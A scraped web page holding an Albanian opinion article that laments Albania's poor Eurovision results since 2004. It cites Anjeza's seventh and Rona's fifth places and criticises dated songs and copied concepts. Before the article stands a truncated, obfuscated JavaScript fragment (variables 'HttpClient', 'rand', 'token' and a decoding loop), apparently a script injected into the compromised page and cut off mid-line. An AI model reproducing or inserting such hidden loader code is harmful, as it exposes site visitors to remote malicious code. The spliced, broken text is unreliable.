;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Eurovisioni, ku gabojmë e a do të kemi ndonjëherë shanse për sukses ?!

By

Paraqet një prej ngjarjeve më me peshë në diskografinë shqiptare.

Festivali europian Eurosong dhe tentimet për kualifikim absorvojnë shumë energji e përpjeke çdo vit në Festivalin e Këngës të RTSH.

Përderisa përfaqësimi në këtë festival përbën diçka shumë të rëndësishme tek ne, Eurovisioni në vendet tjera përceptohet si diçka periferike dhe e bukur sa zgjat për publikun brenda netëve të gjysmë-finales e finales.

Megjithë përpjekjet dhe euforinë që na kaplon në rrjete sociale, rezultati është pothuajse gjithnjë dëshpërues. Që prej debutimit në 2004-tën, suksesi ka ardhur vetëm dy herë, me Anjezën si e shtata dhe Ronën si e pesta.

Të tjera herë kur Shqipëria ka mbërritur të prek finalen, katapultimi është bërë në pozitën e 16 dhe atë të 17.

E formula politike e votimit ka ditur të jetë i vetmi ‘qetësim’ pas nervozës në votime, por edhe ky nuk arsyeton tërësisht performancën.

E vërteta është se këngët e dalura nga moda, kopjet e koncepteve të krijimeve muzikore fituese në vitet paraprake dhe organizimi aspak me shije janë disa prej faktorëve kryesorë të cilët na bëjnë të jemi në gjendjen në të cilën jemi në këtë kompeticion.

Fatkeqësisht, me çfarë shihet edhe me trendet e fundit me ‘Përrallën’ e Eneda Tarifës e përkthyer si ‘Makth’ nga mediat ndërkombëtare, ndryshimi rezulton që do jetë akoma shuuumë i largët. /Prive.al/

Artikuj të ngjashëm